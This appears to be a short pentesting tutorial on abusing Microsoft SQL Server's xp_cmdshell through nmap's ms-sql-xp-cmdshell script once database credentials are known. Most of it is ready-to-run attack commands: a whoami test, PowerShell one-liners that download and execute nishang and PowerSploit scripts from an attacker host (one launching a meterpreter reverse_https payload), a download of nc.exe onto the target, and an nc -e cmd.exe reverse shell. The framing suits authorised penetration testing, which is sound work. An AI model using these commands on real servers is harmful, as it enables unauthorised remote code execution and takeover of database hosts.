In a pentesting engagement, if you got the credentials of the MS SQL SERVER you can easily execute any command on the database server with nmap NSE script, ms-sql-xp-cmdshell.

In the following example we execute whoami command in the MS SQL Windows server:

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="whoami" $IP

You have to substitute the following parameters of the above command:

• mssql.username: Database username (sa in the example)

• mssql.password: Database password (sa in the example)

• ms-sql-xp-cmdshell.cmd: Command to execute (whoami in the example)

If you want to execute a reverse shell to connect back to your machine, you can use any of the Windows Powershell post exploitation frameworks shown below to do that.

xp_cmdshell with nishang

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"

xp_cmdshell with Powersploit

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1');\ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"

xp_cmdshell with nc

First we need to download nc to the target machine (192.168.1.10) from our machine (192.168.1.3):

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="powershell.exe wget http://192.168.1.3/nc.exe -OutFile c:\\Users\Public\\nc.exe" 192.168.1.10

Now we can execute the reverse shell:

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="c:\\Users\Public\\nc.exe -e cmd.exe 192.168.1.3 4444" 192.168.1.10